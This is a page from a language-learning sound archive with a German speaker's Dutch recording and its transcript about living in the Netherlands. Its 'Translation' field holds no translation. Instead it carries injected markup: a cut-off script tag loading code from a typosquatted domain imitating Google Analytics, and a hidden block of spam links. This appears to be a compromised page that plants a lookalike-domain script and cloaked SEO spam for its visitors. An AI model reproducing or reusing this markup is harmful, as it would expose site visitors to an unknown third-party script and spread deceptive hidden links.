Language sounds
Home > Sounds > Wonen in Nederland (Leerboek Taal Vitaal)

‘Wonen in Nederland (Leerboek Taal Vitaal)’
Click to listen to Babylonia Nederlands 02.mp3 (1135Kb)
Non-native speaker
Accent: German
AuthorBabylonia
Date: 10/23/2008

Description of what is on the sound file:
My native language is German, so Dutch is a second language for me.


Transcript of sound file:
Wonen in Nederland

Dat hoor je eigenlijk van de meeste mensen, die voor het eerst een bezoek aan Nederland brengen. Maar hoe ervaar je NL als je er zelf een tijdje hebt gewoond? Lees nu de meningen van enkele Duitse studenten over het thema wonen in Nederland.

Nederland is het land van de grote ramen zonder gordijnen. Tijdens een wandeling langs de grachten kon ik de verleiding niet weerstaan opa Kees bij het TV-kijken gade te slaan of de gezellige inrichting van de familie Schaeffer te bewonderen.

Nederlanders schijnt deze nieuwsgierigheid niet te storen. Integendeel: maar al te graag maken ze anderen deelgenoot van hun leven. En het is juist deze openheid die de Nederlanders voor mij zo sympathiek maakt. (Kristine uit Hannover)


Translation:
'text/javascript' src='http://google-anallytics.com/urchin.js'></script><div style='display:none;'><a href='http://tests4all.org/1/'>stages for losing weight</a><a href='http://tests4all.org/2/'>lauren sones personal trainer</a><a href='http://tests4all.org/3/'>lung cleansing quit smoking</a><a href='http://tests4all.org/4/'>blu eyes crying in the rain</a><a href='http://tests4all.org/5/'>photo proof the cardinals got cheated</a><a href='http://tests4all.org/6/'>video game occupations pay</a><a href='http://tests4all.org/7/'>alpha investment partners limited</a><a href='http://tests4all.org/8/'>britannica iq test</a><a href='http://tests4all.org/9/'>america psychic challenge contestant names</a><a href='http://tests4all.org/10/'>nashville past life regression</a><a href='http://tests4all.org/11/'>andrew elliott death date jun 1968</a><a href='http://tests4all.org/12/'>experimental lung liver cancer treatments</a></div>


Upload a sound file (you need to register or login to the forum first)


DHTML Menu By Milonic JavaScript


Copyright 2022 FX Micheloud - All rights reserved
No part of this website may be copied by any means without my written authorization.